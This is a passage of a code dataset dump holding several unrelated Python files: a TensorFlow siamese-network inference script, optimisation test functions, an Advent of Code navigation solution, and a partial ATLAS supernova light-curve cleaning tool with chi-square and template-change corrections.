'q':\n break\n track_no = input(\"How many tracks have? \")\n if track_no == 'q':\n break\n album = make_album(artist,title,track_no)\n print(album)\nprint(\"Thanks for response\")","repo_name":"Filaraya/Daily-Python-Exercise","sub_path":"make_album function.py","file_name":"make_album function.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71917798569","text":"import tensorflow as tf \nfrom tensorflow.python.framework import graph_util\nfrom tensorflow.python.platform import gfile\nimport cv2\nimport numpy as np\nfrom glob import glob \nimport os\n\nfrom siamese_net import siamese_loss, data_load\n\nfrom tools import eval_classfier\n\ndef inference(image_list, pb_path):\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n sess = tf.Session(config=config)\n # sess = tf.Session()\n\n with gfile.FastGFile(pb_path, 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n sess.graph.as_default()\n tf.import_graph_def(graph_def, name='') # 导入计算图\n sess.run(tf.global_variables_initializer())\n\n input_1 = sess.graph.get_tensor_by_name('input_x1:0')\n \n output = sess.graph.get_tensor_by_name('siamese/output:0')\n\n output_image = sess.run(output, feed_dict={input_1:image_list})\n\n return output_image\n\nif __name__ == \"__main__\":\n import random\n \n pb_path = 'pb/siamese.ckpt-796-10.11599.pb'\n input_dir = ''\n input_dir_ok = ''\n batch_size = 9\n image_shape = 60\n thresh = 15\n data_1, label_1 = data_load(input_dir, image_shape)\n data_2, label_2 = data_load(input_dir_ok, image_shape)\n num_data_1 = len(label_1)\n num_data_2 = len(label_2)\n\n predict = []\n label = []\n\n batch_len = int(num_data_1 / batch_size)\n for idx in range(batch_len):\n \n batch_data_1 = data_1[idx*batch_size:(idx+1)*batch_size]\n batch_label_1 = label_1[idx*batch_size:(idx+1)*batch_size]\n\n ind_2 = random.sample(range(0, num_data_2), batch_size)\n batch_data_2 = data_2[ind_2]\n batch_label_2 = label_2[ind_2]\n\n batch_y = np.array(batch_label_1==batch_label_2, dtype=np.float32)\n output_1 = inference(batch_data_1, pb_path)\n output_2 = inference(batch_data_2, pb_path)\n\n diff = output_1 - output_2\n diff = np.sum(np.square(diff), 1)\n diff = np.sum(diff, 1)\n diff = np.sqrt(np.mean(diff, 1))\n \n pre = diff.copy()\n pre[diff>thresh] = 0\n pre[diff<=thresh] = 1\n predict.append(list(pre))\n label.append(list(batch_y))\n\n\n predict = np.squeeze(np.reshape(np.array(predict, np.int32), [1,-1]), 0)\n label = np.squeeze(np.reshape(np.array(label, np.int32), [1,-1]), 0)\n precision, recall, acc = eval_classfier(predict, label)\n","repo_name":"STONEKONG/siamese-tensorflow","sub_path":"inference_siamese.py","file_name":"inference_siamese.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"44033278400","text":"import os\nimport sys\nimport numpy as np\nimport pandas as pd\n\n\ndef function_1(X):\n numerator = np.power(np.sin(X[0] * np.pi * 2), 3) * np.sin(X[1] * np.pi * 2) \n denominator = np.power(X[0], 3) * (X[0] + X[1])\n\n return np.divide(numerator, denominator)\n\n\ndef f(X, constants):\n part_1 = constants[\"a\"] * np.power(X, 2)\n part_2 = constants[\"b\"] * X\n part_3 = constants[\"e\"] * np.sin(constants[\"f\"] * (constants[\"Pi_min\"] - X))\n\n return part_1 + part_2 + np.absolute(part_3) + constants[\"c\"]\n\n\ndef function2(X):\n df = pd.read_csv(os.path.join(sys.path[0], \"unidades_geradoras.csv\"))\n cost = 0 \n \n for i in range(40):\n constants = df.iloc[i]\n cost += f(X[i], constants)\n\n return cost","repo_name":"ufv-ciencia-da-computacao/tp02-ccf480","sub_path":"functions/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72280058088","text":"from typing import List\n\ndirectionMap = {0: [0,1], 1: [1,0], 2: [0, -1], 3: [-1,0]}\nweatherMap = {\"N\": [0,1], \"E\": [1,0], \"S\": [0, -1], \"W\": [-1,0]}\nrotateMap = {\"R\": [1, -1], \"L\": [-1, 1]}\n\ndef refinedManhattan(instructions: List[str]) -> int:\n xw,yw, xs, ys = 10, 1, 0,0\n for i in instructions:\n dir = i[0]\n dist = int(i[1:])\n if dir in weatherMap:\n xw, yw = xw + weatherMap[dir][0]*dist, yw + weatherMap[dir][1]*dist\n elif dir in rotateMap:\n for _ in range(dist // 90):\n oldX = xw\n xw = (rotateMap[dir][0]*(yw-ys)) + xs\n yw = (rotateMap[dir][1]*(oldX-xs)) + ys\n elif dir == \"F\":\n moveX, moveY = xw - xs, yw-ys\n xs,ys = xs + moveX*dist, ys + moveY*dist\n xw,yw = xw + moveX*dist, yw + moveY*dist\n\n return abs(xs) + abs(ys)\n\n\ndef getManhattanDistanceAfterInstructions(instructions: List[str]) -> int:\n x,y,direction = 0,0,1\n for i in instructions:\n dir = i[0]\n dist = int(i[1:])\n\n if dir in weatherMap:\n x, y = x + weatherMap[dir][0]*dist, y + weatherMap[dir][1]*dist\n elif dir in rotateMap:\n direction = (direction + rotateMap[dir][0]*dist // 90) % 4\n elif dir == \"F\":\n x,y = x + directionMap[direction][0]*dist, y + directionMap[direction][1]*dist\n\n return abs(x) + abs(y)\n\ndef main():\n inputSequence = [l.strip() for l in open(\"12.txt\").readlines()]\n print(f\"Part 1: {getManhattanDistanceAfterInstructions(inputSequence)}\")\n print(f\"Part 2: {refinedManhattan(inputSequence)}\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"Flourish3/AdventOfCode","sub_path":"2020/python/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36806389004","text":"#!/usr/bin/env python\n\"\"\"\n@author: Sofia Rest\n\"\"\"\n\nimport sys, argparse, configparser, re, os\nfrom copy import deepcopy\nimport pandas as pd\nimport numpy as np\n\nfrom pdastro import pdastrostatsclass, AandB, AnotB\nfrom atlas_lc import atlas_lc\nfrom plot_atlas_lc import plot_atlas_lc\nfrom asym_gaussian import gauss2lc\n\nclass clean_atlas_lc():\n\tdef __init__(self):\n\t\t# credentials\n\t\tself.tns_api_key = None\n\t\tself.tns_id = None\n\t\tself.bot_name = None\n\n\t\t# input/output\n\t\tself.output_dir = None\n\t\tself.snlist_filename = None\n\t\tself.snlist = None\n\t\tself.overwrite = True\n\t\tself.num_controls = 0\n\n\t\t# flags for each cut\n\t\tself.flags = {'chisquare':0x1,\n\n\t\t\t\t\t 'uncertainty':0x2,\n\n\t\t\t\t\t 'controls_bad':0x400000,\n\t\t\t\t\t 'controls_questionable':0x80000,\n\t\t\t\t\t 'controls_x2':0x100,\n\t\t\t\t\t 'controls_stn':0x200,\n\t\t\t\t\t 'controls_Nclip':0x400,\n\t\t\t\t\t 'controls_Ngood':0x800,\n\n\t\t\t\t\t 'avg_badday':0x800000,\n\t\t\t\t\t 'avg_ixclip':0x1000,\n\t\t\t\t\t 'avg_smallnum':0x2000}\n\n\t\t# uncertainty cut\n\t\tself.uncertainties = False \n\t\tself.uncertainty_cut = None\n\n\t\t# estimating true uncertainties\n\t\tself.estimate_true_uncertainties = False\n\t\tself.estimate_true_uncertainties_chisquare_cut = None\n\n\t\t# chi-square cut\n\t\tself.chisquares = False\n\t\tself.chisquare_cut = None \n\t\tself.stn_bound = None\n\t\tself.min_cut = None\n\t\tself.max_cut = None\n\t\tself.cut_step = None\n\t\tself.contam_lim = None\n\t\tself.loss_lim = None\n\t\tself.lim_to_prioritize = None\n\n\t\t# control light curve cut\n\t\tself.controls = False\n\t\tself.c_x2_max = None\n\t\tself.stn_max = None\n\t\tself.c_Nclip_max = None\n\t\tself.c_Ngood_min = None\n\n\t\t# averaging\n\t\tself.mjd_bin_size = None\n\t\tself.keep_empty_bins = False\n\t\tself.flux2mag_sigmalimit = None\n\t\tself.g_Nclip_max = None\n\t\tself.g_Ngood_min = None \n\t\tself.g_x2_max = None\n\n\t\t# detecting pre-SN bumps\n\t\tself.detect_bumps = False\n\t\tself.gaussian_sigma = None\n\t\tself.appmags = None\n\t\tself.start_mjd = None\n\t\tself.end_mjd = None\n\t\n\t# define command line arguments\n\tdef define_args(self, parser=None, usage=None, conflict_handler='resolve'):\n\t\tif parser is None:\n\t\t\tparser = argparse.ArgumentParser(usage=usage,conflict_handler=conflict_handler)\n\t\t\n\t\tparser.add_argument('tnsnames', nargs='+', help='TNS names of the objects to download from ATLAS')\n\t\t\n\t\tparser.add_argument('-x', '--chisquares', default=False, action='store_true', help='apply chi-square cut')\n\t\tparser.add_argument('-u', '--uncertainties', default=False, action='store_true', help='apply uncertainty cut')\n\t\tparser.add_argument('-c', '--controls', default=False, action='store_true', help='apply control light curve cut')\n\t\t\n\t\tparser.add_argument('-g', '--average', default=False, action='store_true', help='average light curves and cut bad days')\n\t\tparser.add_argument('-m', '--mjd_bin_size', type=float, default=None, help='MJD bin size in days for averaging')\n\n\t\tparser.add_argument('-b', '--detect_bumps', default=False, action='store_true', help='apply rolling gaussian weighted sum to flux/dflux in order to amplify possible precursor bumps')\n\t\tparser.add_argument('--sim_gaussian', nargs=3, default=None, help=('comma-separated peakMJD list, peak_appmag, gaussian_sigma: add a gaussian at peakMJD with a peak apparent magnitude of peak_appmag and a sigma of gaussian_sigma in days'))\n\n\t\tparser.add_argument('-p', '--plot', default=False, action='store_true', help='plot each cut and save into PDF file')\n\t\tparser.add_argument('--xlim_lower', type=float, default=None, help='if plotting, manually set lower x axis limit to a certain MJD')\n\t\tparser.add_argument('--xlim_upper', type=float, default=None, help='if plotting, manually set upper x axis limit to a certain MJD')\n\t\tparser.add_argument('--ylim_lower', type=float, default=None, help='if plotting, manually set lower y axis limit to a certain uJy')\n\t\tparser.add_argument('--ylim_upper', type=float, default=None, help='if plotting, manually set upper y axis limit to a certain uJy')\n\n\t\tparser.add_argument('--skip_tc', default=False, action='store_true', help='skip correction for ATLAS template changes')\n\t\tparser.add_argument('-f','--cfg_filename', default='params.ini', type=str, help='file name of ini file with settings for this class')\n\t\tparser.add_argument('--dont_overwrite', default=False, action='store_true', help='don\\'t overwrite existing file with same file name')\n\t\tparser.add_argument('-a','--tns_api_key', type=str, help='api key to access TNS')\n\t\t\n\t\treturn parser\n\n\t# load config settings from file and reconcile with command arguments\n\tdef load_settings(self, args):\n\t\tprint('LOADING SETTINGS FROM CONFIG FILE AND CMD ARGUMENTS...')\n\n\t\tcfg = configparser.ConfigParser()\n\t\ttry:\n\t\t\tprint(f'Loading config file at {args.cfg_filename}')\n\t\t\tcfg.read(args.cfg_filename)\n\t\texcept Exception as e:\n\t\t\traise RuntimeError(f'ERROR: Could not load config file at {args.cfg_filename}!')\n\n\t\tself.tns_api_key = cfg['TNS credentials']['api_key'] if args.tns_api_key is None else args.tns_api_key\n\t\tself.tns_id = cfg['TNS credentials']['tns_id']\n\t\tself.bot_name = cfg['TNS credentials']['bot_name']\n\t\tself.output_dir = cfg['Input/output settings']['output_dir']\n\t\tprint(f'Light curve .txt files output directory: {self.output_dir}')\n\n\t\t# attempt to load snlist.txt; if does not exist, create new snlist table\n\t\tself.snlist_filename = cfg['Input/output settings']['snlist_filename']\n\t\tif os.path.exists(self.snlist_filename):\n\t\t\tself.snlist = pdastrostatsclass()\n\t\t\tself.snlist.load_spacesep(f'{self.output_dir}/{self.snlist_filename}', delim_whitespace=True)\n\t\telse:\n\t\t\tself.snlist = pdastrostatsclass(columns=['tnsname', 'ra', 'dec', 'discovery_date', 'closebright_ra', 'closebright_dec'])\n\n\t\tself.overwrite = not args.dont_overwrite\n\t\tprint(f'Overwrite existing light curve files: {self.overwrite}')\n\t\tself.num_controls = int(cfg['Control light curve settings']['num_controls'])\n\t\tprint(f'Number of control light curves: {self.num_controls}')\n\t\tself.plot = bool(args.plot)\n\t\tprint(f'Plotting: {self.plot}')\n\t\tself.skip_tc = bool(args.skip_tc)\n\t\tif self.skip_tc:\n\t\t\tprint(f'Skipping correction for ATLAS template changes: {self.skip_tc}')\n\n\t\tself.estimate_true_uncertainties = cfg['True uncertainties estimation settings']['estimate_true_uncertainties']=='True'\n\t\tself.estimate_true_uncertainties_chisquare_cut = float(cfg['True uncertainties estimation settings']['estimate_true_uncertainties_chisquare_cut'])\n\t\tif self.estimate_true_uncertainties:\n\t\t\tprint(f'Estimating true uncertainties set to {self.estimate_true_uncertainties} with preliminary chi-square cut at {self.estimate_true_uncertainties_chisquare_cut:0.2f}')\n\n\t\tself.chisquares = args.chisquares\n\t\tif self.chisquares:\n\t\t\tprint(f'\\nChi-square cut: {self.chisquares}')\n\t\t\ttry:\n\t\t\t\tself.chisquare_cut = float(cfg['Chi-square cut settings']['override_cut'])\n\t\t\t\tprint(f'# Overriding dynamic chi-square cut with manual cut of x2 = {self.chisquare_cut}')\n\t\t\texcept:\n\t\t\t\tself.stn_bound = float(cfg['Chi-square cut settings']['stn_bound'])\n\t\t\t\tself.min_cut = int(cfg['Chi-square cut settings']['min_cut'])\n\t\t\t\tself.max_cut = int(cfg['Chi-square cut settings']['max_cut'])\n\t\t\t\tself.cut_step = int(cfg['Chi-square cut settings']['cut_step'])\n\t\t\t\tself.contam_lim = float(cfg['Chi-square cut settings']['contamination_limit'])\n\t\t\t\tself.loss_lim = float(cfg['Chi-square cut settings']['loss_limit'])\n\t\t\t\tself.lim_to_prioritize = cfg['Chi-square cut settings']['limit_to_prioritize']\n\t\t\t\tif not(self.lim_to_prioritize == 'loss' or self.lim_to_prioritize == 'contamination'):\n\t\t\t\t\traise RuntimeError(f'ERROR: Limit to prioritize (limit_to_prioritize in config file) must be set to \\'contamination\\' or \\'loss\\' but currently set to {self.lim_to_prioritize}!')\n\t\t\t\tprint(f'# abs(flux/dflux) bound that determines a \"good\" measurement vs. \"bad\" measurement: {self.stn_bound}')\n\t\t\t\tprint(f'# Cut range: [{self.min_cut}, {self.max_cut}], both ends inclusive, with step size {self.cut_step}')\n\t\t\t\tprint(f'# Contamination percent limit: {self.contam_lim}')\n\t\t\t\tprint(f'# Loss percent limit: {self.loss_lim}')\n\t\t\t\tprint(f'# Limit to prioritize: {self.lim_to_prioritize}')\n\n\t\tself.uncertainties = args.uncertainties\n\t\tif self.uncertainties:\n\t\t\tprint(f'\\nUncertainty cut: {self.uncertainties}')\n\t\t\tself.uncertainty_cut = float(cfg['Uncertainty cut settings']['cut'])\n\t\t\tprint(f'# Set to cut at dflux = {self.uncertainty_cut}')\n\n\t\tself.controls = args.controls\n\t\tif self.controls:\n\t\t\tprint(f'\\nControl light curve cut: {self.controls}')\n\t\t\tself.c_x2_max = float(cfg['Control light curve cut settings']['x2_max'])\n\t\t\tself.stn_max = float(cfg['Control light curve cut settings']['stn_max'])\n\t\t\tself.c_Nclip_max = int(cfg['Control light curve cut settings']['Nclip_max'])\n\t\t\tself.c_Ngood_min = int(cfg['Control light curve cut settings']['Ngood_min'])\n\t\t\tprint(f'# Bound for an epoch\\'s maximum chi-square: {self.c_x2_max}')\n\t\t\tprint(f'# Bound for an epoch\\'s maximum abs(flux/dflux) ratio: {self.stn_max}')\n\t\t\tprint(f'# Bound for an epoch\\'s maximum number of clipped control measurements: {self.c_Nclip_max}')\n\t\t\tprint(f'# Bound for an epoch\\'s minimum number of good control measurements: {self.c_Ngood_min}')\n\n\t\tself.averaging = args.average \n\t\tif self.averaging:\n\t\t\tprint(f'\\nAveraging and cutting bad days: {self.averaging}')\n\t\t\tself.flux2mag_sigmalimit = int(cfg['Input/output settings']['flux2mag_sigmalimit'])\n\t\t\tprint(f'# Sigma limit when converting flux to magnitude (magnitudes are limits when dmagnitudes are NaN): {self.flux2mag_sigmalimit}')\n\t\t\tself.mjd_bin_size = args.mjd_bin_size if not(args.mjd_bin_size is None) else float(cfg['Averaging settings']['mjd_bin_size'])\n\t\t\tprint(f'# MJD bin size: {self.mjd_bin_size} days')\n\t\t\tself.keep_empty_bins = cfg['Averaging settings']['keep_empty_bins']=='True'\n\t\t\tprint(f'# Keep empty bins and store as NaN in averaged light curve: {self.keep_empty_bins}')\n\t\t\t\n\t\t\tself.g_Nclip_max = int(cfg['Averaging settings']['Nclip_max'])\n\t\t\tself.g_Ngood_min = int(cfg['Averaging settings']['Ngood_min'])\n\t\t\tself.g_x2_max = float(cfg['Averaging settings']['x2_max'])\n\t\t\tprint(f'# MJD bin bounds for not flagging as bad day: ')\n\t\t\tprint(f'## Maximum number of clipped measurements (Nclip_max): {self.g_Nclip_max}')\n\t\t\tprint(f'## Minimum number of good measurements (Ngood_min): {self.g_Ngood_min}')\n\t\t\tprint(f'## Maximum chi-square (x2_max): {self.g_x2_max}')\n\n\t\tself.detect_bumps = args.detect_bumps\n\t\tif self.detect_bumps:\n\t\t\tprint(f'\\nDetecting pre-SN bumps: {self.detect_bumps}')\n\t\t\tself.apply_to_controls = cfg['Detecting bumps settings']['apply_to_controls']=='True'\n\t\t\tprint(f'# Applying to control light curves in order to establish detection limit: {self.apply_to_controls}')\n\t\t\tself.gaussian_sigma = float(cfg['Detecting bumps settings']['gaussian_sigma'])\n\t\t\tprint(f'# Searching for pre-SN bumps with a sigma of {self.gaussian_sigma:0.2f} days')\n\t\t\t\n\t\t\t# simulated gaussian settings\n\t\t\tif not(args.sim_gaussian is None):\n\t\t\t\tprint(f'# Adding simulated gaussian pre-SN bump to SN light curve: True')\n\t\t\t\tif ',' in args.sim_gaussian[1]:\n\t\t\t\t\tself.appmags = args.sim_gaussian[1].split(',')\n\t\t\t\t\tprint(f'## Multiple magnitudes input: {self.appmags}')\n\t\t\t\telse:\n\t\t\t\t\tself.appmags = [args.sim_gaussian[1]]\n\t\t\t\t\tprint(f'## Only one magnitude input: {self.appmags}')\n\t\t\t\n\t\t\t# custom MJD range for bump detection\n\t\t\tif not(cfg['Detecting bumps settings']['start_mjd'] == 'None'):\n\t\t\t\tself.start_mjd = float(cfg['Detecting bumps settings']['start_mjd'])\n\t\t\t\tprint('# Will start bump detection at MJD={self.start_mjd}')\n\t\t\tif not(cfg['Detecting bumps settings']['end_mjd'] == 'None'):\n\t\t\t\tprint('# Will end bump detection at MJD={self.end_mjd}')\n\t\t\t\tself.end_mjd = float(cfg['Detecting bumps settings']['end_mjd'])\n\n\t# helper function for get_baseline_regions()\n\tdef get_Ndays(self, SN_region_index):\n\t\treturn 200 if SN_region_index == 2 else 40\n\n\tdef get_SNstart_region(self, discdate, tchange1, tchange2):\n\t\t# find region SN starts in \n\t\tSN_region_index = None\n\t\tif discdate <= tchange1:\n\t\t\tSN_region_index = 0\n\t\telif discdate > tchange1 and discdate <= tchange2:\n\t\t\tSN_region_index = 1\n\t\telif discdate > tchange2:\n\t\t\tSN_region_index = 2\n\t\tif SN_region_index is None:\n\t\t\traise RuntimeError('## ERROR: Something went wrong--could not find region with SN discovery date!')\n\t\telse:\n\t\t\tprint('## SN discovery date located in template region t%d' % SN_region_index)\n\t\treturn SN_region_index\n\n\n\t# get regions of a lc where no SN flux is present\n\tdef get_baseline_regions(self, lc, Ndays_min):\n\t\tprint('# Getting region indices around SN... ')\n\n\t\tbaseline_ix = lc.get_baseline_ix()\n\t\ttchange1 = 58417\n\t\ttchange2 = 58882\n\n\t\tregions = {}\n\t\tregions['t0'] = lc.lcs[0].ix_inrange(colnames=['MJD'], uplim=tchange1)\n\t\tregions['t1'] = lc.lcs[0].ix_inrange(colnames=['MJD'], lowlim=tchange1, uplim=tchange2)\n\t\tregions['t2'] = lc.lcs[0].ix_inrange(colnames=['MJD'], lowlim=tchange2)\n\t\tregions['b_t0'] = AandB(regions['t0'], baseline_ix)\n\t\tregions['b_t1'] = AandB(regions['t1'], baseline_ix)\n\t\tregions['b_t2'] = AandB(regions['t2'], baseline_ix)\n\n\t\tfound_region_ix = []\n\t\tfor region_index in range(0,3):\n\t\t\tif len(regions['t%d'%region_index]) > 0:\n\t\t\t\tprint('## TEMPLATE REGION t%d MJD RANGE: %0.2f - %0.2f' % (region_index, lc.lcs[0].t.loc[regions['t%d'%region_index][0],'MJD'], lc.lcs[0].t.loc[regions['t%d'%region_index][-1],'MJD']))\n\t\t\t\tfound_region_ix.append(region_index)\n\t\t\telse:\n\t\t\t\tprint('## TEMPLATE REGION t%d MJD RANGE: not found' % region_index)\n\t\t\n\t\t# cannot do flux correction?\n\t\tif len(found_region_ix) <= 1 or self.skip_tc:\n\t\t\tprint('WARNING: At least 2 template regions do not contain any data. Therefore, flux could not be corrected according to the ATLAS reference template changes. Skipping...')\n\t\t\t\"\"\"\n\t\t\t# try to get baseline flux\n\t\t\tSN_region_index = self.get_SNstart_region(lc.discdate, tchange1, tchange2) # find region with SN in it\n\t\t\tif SN_region_index in found_region_ix: # SN discovery date is in one of the found regions\n\t\t\t\t# get last Ndays days for baseline\n\t\t\t\tlc.corrected_baseline_ix = lc.lcs[0].ix_inrange(colnames=['MJD'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tlowlim=lc.lcs[0].t.loc[regions['t%d'%SN_region_index][-1],'MJD'] - self.get_Ndays(SN_region_index),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tuplim=lc.lcs[0].t.loc[regions['t%d'%SN_region_index][-1],'MJD'])\n\t\t\telif len(found_region_ix) == 1: # one template region has data\n\t\t\t\t# get all of found template for baseline\n\t\t\t\tlc.corrected_baseline_ix = regions[f't{found_region_ix[0]}']\n\t\t\telse: # no template region has data, so basically no data... this is pretty bad but hopefully will not come to this\n\t\t\t\tlc.corrected_baseline_ix = baseline_ix # will be None\n\t\t\tlc.during_sn_ix = AnotB(lc.lcs[0].getindices(), lc.corrected_baseline_ix)\n\n\t\t\tprint(len(lc.corrected_baseline_ix), lc.corrected_baseline_ix)\n\t\t\tprint(len(lc.during_sn_ix), lc.during_sn_ix)\n\t\t\tsys.exit()\n\t\t\t\"\"\"\n\t\t\tlc.corrected_baseline_ix = baseline_ix\n\t\t\tlc.during_sn_ix = AnotB(lc.lcs[0].getindices(), lc.corrected_baseline_ix)\n\t\t\treturn None, lc\n\n\t\tSN_region_index = self.get_SNstart_region(lc.discdate, tchange1, tchange2)\n\n\t\t# for region with tail end of the SN, get last Ndays days and classify as baseline\n\t\tadjust_region_index = SN_region_index\n\t\tif adjust_region_index < 2 and len(regions['b_t%d'%adjust_region_index]) >= Ndays_min:\n\t\t\tadjust_region_index += 1\n\t\tif len(regions['b_t%d'%adjust_region_index]) < Ndays_min:\n\t\t\tprint('## Getting baseline flux for template region t%d by obtaining last %d days of region... ' % (adjust_region_index, self.get_Ndays(adjust_region_index)))\n\t\t\tregions['b_t%d'%adjust_region_index] = lc.lcs[0].ix_inrange(colnames=['MJD'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tlowlim=lc.lcs[0].t.loc[regions['t%d'%adjust_region_index][-1],'MJD'] - self.get_Ndays(adjust_region_index),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tuplim=lc.lcs[0].t.loc[regions['t%d'%adjust_region_index][-1],'MJD'])\n\t\tif adjust_region_index < 1: regions['b_t1'] = regions['t1']\n\t\tif adjust_region_index < 2: regions['b_t2'] = regions['t2']\n\n\t\tfor region_index in range(0,3):\n\t\t\tif len(regions['b_t%d'%region_index]) > 0:\n\t\t\t\tprint('## TEMPLATE REGION t%d BASELINE MJD RANGE: %0.2f - %0.2f' % (region_index, lc.lcs[0].t.loc[regions['b_t%d'%region_index][0],'MJD'], lc.lcs[0].t.loc[regions['b_t%d'%region_index][-1],'MJD']))\n\t\t\telse:\n\t\t\t\tprint('## TEMPLATE REGION t%d BASELINE MJD RANGE: not found' % region_index)\n\n\t\t# check to make sure baseline flux is still consistent by getting median of first and last halves of affected region\n\t\tfirst_i = regions['b_t%d'%adjust_region_index][0]\n\t\tmid_i = regions['b_t%d'%adjust_region_index][int(len(regions['b_t%d'%adjust_region_index])/2)]\n\t\tlast_i = regions['b_t%d'%adjust_region_index][-1]\n\t\tmedian1 = np.median(lc.lcs[0].t.loc[lc.lcs[0].ix_inrange(colnames=['MJD'], lowlim=lc.lcs[0].t.loc[first_i,'MJD'], uplim=lc.lcs[0].t.loc[mid_i,'MJD']), 'uJy'])\n\t\tmedian2 = np.median(lc.lcs[0].t.loc[lc.lcs[0].ix_inrange(colnames=['MJD'], lowlim=lc.lcs[0].t.loc[mid_i+1,'MJD'], uplim=lc.lcs[0].t.loc[last_i,'MJD']), 'uJy'])\n\t\tprint(f'## Checking that baseline flux is consistent throughout adjusted region...\\n## Median of first half: {median1:0.2f}\\n## Median of second half: {median2:0.2f}')\n\n\t\tlc.corrected_baseline_ix = np.concatenate([regions['b_t0'], regions['b_t1'], regions['b_t2']])\n\t\tlc.during_sn_ix = AnotB(lc.lcs[0].getindices(), lc.corrected_baseline_ix)\n\t\t\n\t\treturn regions, lc\n\n\t# correct control light curves for atlas template changes at mjd=58417,58882 \n\tdef controls_correct_for_template(self, lc, control_index, regions, region_index):\n\t\tgoodx2_i = lc.lcs[control_index].ix_inrange(colnames=['chi/N'], uplim=5)\n\n\t\t# get indices of control lc that match up with SN's baseline region\n\t\t#lowlim = lc.lcs[0].t.loc[regions[f'b_t{region_index}'][0], 'MJD'] \n\t\t#uplim = lc.lcs[0].t.loc[regions[f'b_t{region_index}'][-1], 'MJD']\n\t\t\n\t\t# get indices of target template region\n\t\ttchange1 = 58417\n\t\ttchange2 = 58882\n\t\tlowlim = None\n\t\tuplim = None\n\t\tif region_index == 0:\n\t\t\tuplim = tchange1\n\t\telif region_index == 1:\n\t\t\tlowlim = tchange1\n\t\t\tuplim = tchange2\n\t\telif region_index == 2:\n\t\t\tlowlim = tchange2\n\t\tregion_i = lc.lcs[control_index].ix_inrange(colnames=['MJD'], lowlim=lowlim, uplim=uplim, exclude_uplim=True)\n\n\t\tif len(region_i) > 0:\n\t\t\t# get median of template region\n\t\t\tif len(AandB(region_i,goodx2_i)) > 0:\n\t\t\t\tmedian = np.median(lc.lcs[control_index].t.loc[AandB(region_i,goodx2_i),'uJy'])\n\t\t\telse:\n\t\t\t\tmedian = np.median(lc.lcs[control_index].t.loc[region_i,'uJy'])\n\n\t\t\t#lowlim = lc.lcs[0].t.loc[regions[f't{region_index}'][0], 'MJD']\n\t\t\t#uplim = lc.lcs[0].t.loc[regions[f't{region_index}'][-1], 'MJD']\n\t\t\t#t_region_i = lc.lcs[control_index].ix_inrange(colnames=['MJD'], lowlim=lowlim, uplim=uplim, exclude_uplim=True)\n\t\t\t#lc.lcs[control_index].t.loc[t_region_i,'uJy'] -= median\n\n\t\t\t# subtract median from entire template region of control lc\n\t\t\tlc.lcs[control_index].t.loc[region_i,'uJy'] -= median\n\n\t\treturn lc\n\n\t# correct for atlas template changes at mjd=58417,58882 \n\t# more info here: https://fallingstar-data.com/forcedphot/faq/\n\tdef correct_for_template(self, lc):\n\t\tprint('\\nCorrecting for potential flux in template due to template changes at MJD=58417,58882...')\n\t\toutput = ''\n\t\t\n\t\t# automatically define baseline regions according to discovery date\n\t\tregions, lc = self.get_baseline_regions(lc, Ndays_min=6)\n\t\tif regions is None:\n\t\t\toutput += 'Either correction was skipped, or not enough data found in at least 2 template regions. Could not correct for template changes.'\n\t\t\treturn lc, output\n\n\t\t# get indices of measurements with x2<=5 so that when getting median, use these indices if possible\n\t\tb_goodx2_i = lc.lcs[0].ix_inrange(colnames=['chi/N'], uplim=5, indices=lc.corrected_baseline_ix)\n\n\t\t# for each region, adjust for template change by subtracting median of that region's baseline flux\n\t\tfor region_index in range(0,3):\n\t\t\tregion_i = regions[f'b_t{region_index}']\n\t\t\tif len(region_i) > 0:\n\t\t\t\tprint(f'# Adjusting for template change in region b_t{region_index} from {lc.lcs[0].t.loc[region_i[0],\"MJD\"]:0.2f}-{lc.lcs[0].t.loc[region_i[-1],\"MJD\"]:0.2f}...')\n\t\t\t\tprint(f'## Baseline median before: {np.median(lc.lcs[0].t.loc[region_i,\"uJy\"])}')\n\t\t\t\t\n\t\t\t\tif len(AandB(region_i,b_goodx2_i)) > 0:\n\t\t\t\t\tmedian = np.median(lc.lcs[0].t.loc[AandB(region_i,b_goodx2_i),'uJy'])\n\t\t\t\telse:\n\t\t\t\t\tmedian = np.median(lc.lcs[0].t.loc[region_i,'uJy'])\n\n\t\t\t\tprint(f'## Subtracting median {median:0.1f} uJy of baseline flux with chi-square ≤ 5 from light curve flux due to potential flux in the template...')\n\t\t\t\tlc.lcs[0].t.loc[regions['t%d'%region_index],'uJy'] -= median\n\t\t\t\tprint(f'## Baseline median now: {np.median(lc.lcs[0].t.loc[region_i,\"uJy\"])}')\n\t\t\t\toutput += f'\\nCorrection applied to baseline region {region_index}: {median:0.1f} uJy subtracted'\n\n\t\t\t\t# control lc correction\n\t\t\t\tif self.controls:\n\t\t\t\t\tprint(f'## Correcting control light curves for potential flux in template...')\n\t\t\t\t\tfor control_index in range(1,self.num_controls+1):\n\t\t\t\t\t\tlc = self.controls_correct_for_template(lc, control_index, regions, region_index)\n\t\t\telse:\n\t\t\t\tprint(f'# No baseline region for region b_t{region_index}, skipping...')\n\n\t\treturn lc, output\n\n\t# drop mask column and any added columns from previous iterations\n\tdef drop_extra_columns(self, lc, control_index=0):\n\t\tdropcols=[]\n\n\t\tfor col in ['Noffsetlc', 'uJy/duJy', '__tmp_SN', 'SNR', 'SNRsum', 'SNRsumnorm', 'SNRsim', 'SNRsimsum']:\n\t\t\tif col in lc.lcs[control_index].t.columns:\n\t\t\t\tdropcols.append(col)\n\t\tfor col in lc.lcs[control_index].t.columns:\n\t\t\tif re.search('^c\\d_',col): 